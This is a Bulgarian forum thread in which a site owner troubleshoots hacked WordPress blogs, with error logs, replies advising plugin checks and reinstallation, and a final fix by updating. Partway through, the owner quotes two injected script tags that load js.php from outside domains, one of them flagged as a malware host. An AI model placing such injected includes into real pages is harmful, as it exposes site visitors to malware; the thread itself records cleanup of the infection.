Нещо стана с блоговете ми на wordpress

Здравейте,
Без да съм пипал нищо изведнъж всичките ми сайтове на wordpress се прецакаха.

Като отворя сайта ми дава ето тази грешка.

public_html/wp-includes/pluggable.php on line 868

а в този файл на този ред е:
header("Location: $location", true, $status);
}

Някакви идеи какво е станало ?
 
От: Нещо стана с блоговете ми на wordpress

Всичките на един и същи хостинг ли са?
Може би нещо са променяли
 
някой от плъгините е, изключи ги всичките, ще дойде сайта, после activate 1 по 1, и намери кое ти прави проблема
или в някой файл имаш прано след кода
 
От: Нещо стана с блоговете ми на wordpress

Аз гледах, че при мен на този ред има друго.
Пробвай да си ъпдейтнеш уордпреса

Доколкото гледах из кода този хедър е за 302 редиректи, ама не ми се ровеше повече. Не съм сигурен кога уордпреса прави такива. Някой плъгин може би ти прави проблемите.
 
От: Нещо стана с блоговете ми на wordpress

Интересното е, че не ми дава да се логна в wordpress-а на който и да е било блог.
Да всичките ми блогове са на един хостинг и абсолютно всички дават тази грешка.
 
От: Нещо стана с блоговете ми на wordpress

Да не си ползвал оня трик за ползването на парк домейни като адон?

Не ти показва логин страницата или не приема юзер+пасс?
 
От: Нещо стана с блоговете ми на wordpress

Не съм ползвал никакви трикове :D
Въобще не мога да отворя страницата с логин формата
 
от хоста/цпанел си преименувай wp-content/plugins на нещо друго, напр. - pluginsx и създай ново plugins folder
ако не дойде сайта така, виж за празни редове след в края на pluggable.php , може и друг файл да е
ако имаш error_logs, виж там какъв е проблема, може да постнеш и тука
 
От: Нещо стана с блоговете ми на wordpress

Питай си хостинг доставчика да не са правили промени по хоста, може да ти помогнат.
 
От: Нещо стана с блоговете ми на wordpress

Грешката май е 404 (Wrong page). В реда който дадох от pluggable.php точно не може да намери главната страница, но интересното е, че ми дава грешката на един от блоговете и като скролна надоло ми излиза и сайта.


Ето от ерор лога.

[Mon Apr 11 22:49:34 2011] [warn] FastCGI: (dynamic) server "/home/progn0zi/public_html/php5.fcgi" (uid 32310, gid 32312) restarted (pid 18246)
[Mon Apr 11 22:49:25 2011] [warn] FastCGI: (dynamic) server "/home/progn0zi/public_html/php5.fcgi" (pid 7169) terminated by calling exit with status '0'
[Mon Apr 11 22:49:25 2011] [warn] FastCGI: (dynamic) server "/home/progn0zi/public_html/php5.fcgi" (pid 7169) termination signaled
[Mon Apr 11 22:44:53 2011] [warn] FastCGI: (dynamic) server "/home/progn0zi/public_html/php5.fcgi" (uid 32310, gid 32312) restarted (pid 7169)
[Mon Apr 11 22:44:25 2011] [warn] FastCGI: (dynamic) server "/home/progn0zi/public_html/php5.fcgi" (pid 28315) terminated by calling exit with status '0'
[Mon Apr 11 22:44:25 2011] [warn] FastCGI: (dynamic) server "/home/progn0zi/public_html/php5.fcgi" (pid 28315) termination signaled
[Mon Apr 11 22:39:37 2011] [warn] FastCGI: (dynamic) server "/home/progn0zi/public_html/php5.fcgi" (uid 32310, gid 32312) restarted (pid 28315)
[Mon Apr 11 22:39:25 2011] [warn] FastCGI: (dynamic) server "/home/progn0zi/public_html/php5.fcgi" (pid 17892) terminated by calling exit with status '0'
[Mon Apr 11 22:39:25 2011] [warn] FastCGI: (dynamic) server "/home/progn0zi/public_html/php5.fcgi" (pid 17892) termination signaled
[Mon Apr 11 22:34:58 2011] [warn] FastCGI: (dynamic) server "/home/progn0zi/public_html/php5.fcgi" (uid 32310, gid 32312) restarted (pid 17892)
[Mon Apr 11 22:34:25 2011] [warn] FastCGI: (dynamic) server "/home/progn0zi/public_html/php5.fcgi" (pid 10908) terminated by calling exit with status '0'
[Mon Apr 11 22:34:25 2011] [warn] FastCGI: (dynamic) server "/home/progn0zi/public_html/php5.fcgi" (pid 10908) termination signaled

Пробвах и папка Plugins да преименувам. Отново без промяна
 
От: Нещо стана с блоговете ми на wordpress

Тоя файл не е от уордпреса.
Честито, изглежда си лепнал някакъв бацил.


ЪПДЕЙТНИ СИ УОРДПРЕСА
или го преинсталирай върху текущата база (преди това си направи бекъп)

Или провери кои са последно променяните файлове и ги замени с тези от оригиналния архив!
 
От: Нещо стана с блоговете ми на wordpress

Ах, ах тая конкуренция.
В последно време някой много яко гледа да ни изкара от пазара. Първо ни адна беклинкове от порно сайтове и гугъл ни прати в sandbox-а, а сега съм почти на 100% сигурен, че пак същия човек се опитва да ни премахне.

Би ли ми казал как да проверя кой са последно променяните файлове ?
 
От: Нещо стана с блоговете ми на wordpress

Оо идеално, вече даже и като опасен ми го засича.

Warning: Something's Not Right Here!
futbolniprognozi.eu contains content from send.warsawfiber.com, a site known to distribute malware. Your computer might catch a virus if you visit this site......
 
От: Нещо стана с блоговете ми на wordpress

Идея си нямам как, но някой ни е лепнал ето този код в index-a, на всички сайтове.

<script type="text/javascript" src="http://johndocphotography.com/js.php"></script>

когато го премахнах сайтовете тръгнаха, но на wp-admin пак ми дава същото за вируса.
Там пък има това..

<script type="text/javascript" src="http://taxisbragandique.com/js.php">
 
От: Нещо стана с блоговете ми на wordpress

Добре бе, що не си ъпдейтнеш уордпреса, толкоз ли е сложно?
Качаш едни файлове, запазваш си само конфигурационните и си готов.
Плъгините ги изключваш, щото може и някой от тях да има дупка нещо и после питаш тука кой плъгин е тестван и кой не. Споделяш каква ти е темата (нулирана/безплатна от неофициалния сайт = 90% зловреден код)
 
От: Нещо стана с блоговете ми на wordpress

Ами то добре да ъпдейтна wordpress, но на futbolniprognozi.eu си е последната версия. И как така да кача само някой файлове ?
 
От: Нещо стана с блоговете ми на wordpress

Не някои а всичките без конфигурационните. Забравих кои бяха точно wp-config май
 
Всичките. Стандартния конфигурационен файл си идва с -dist допълнение, така, че не би направило проблем дори всичко от папката да качиш и в последствие да подкараш ъпгрейд уизарда.
 
От: Нещо стана с блоговете ми на wordpress

@ktomov не разбрах много от поста ти.

Благодаря обаче на всички. Ъпдейтнах абсолютно всички wordpress-и и всичко се оправи, но докога не знам. Не съм свалял никакви файлове и после да ги качвам. Директно им бих ъпдейтите и се оправиха.
Ако може да ми кажете как да се защитя от подобни атаки в бъдеще ?
 
Поста ми значеше следното:
1. Теглиш wordpress от wordpress.org
2. Разархивираш и получаваш папка wordpress (там където си го разархивирал)
3. Прехвърляш всички файлове от тази папка през фтп на хостинга ти.
4. Пускаш site.com/wp-admin/upgrade.php (update.php - изкочи ми от главата кое от двете беше)
5. Готов си.
 

Горе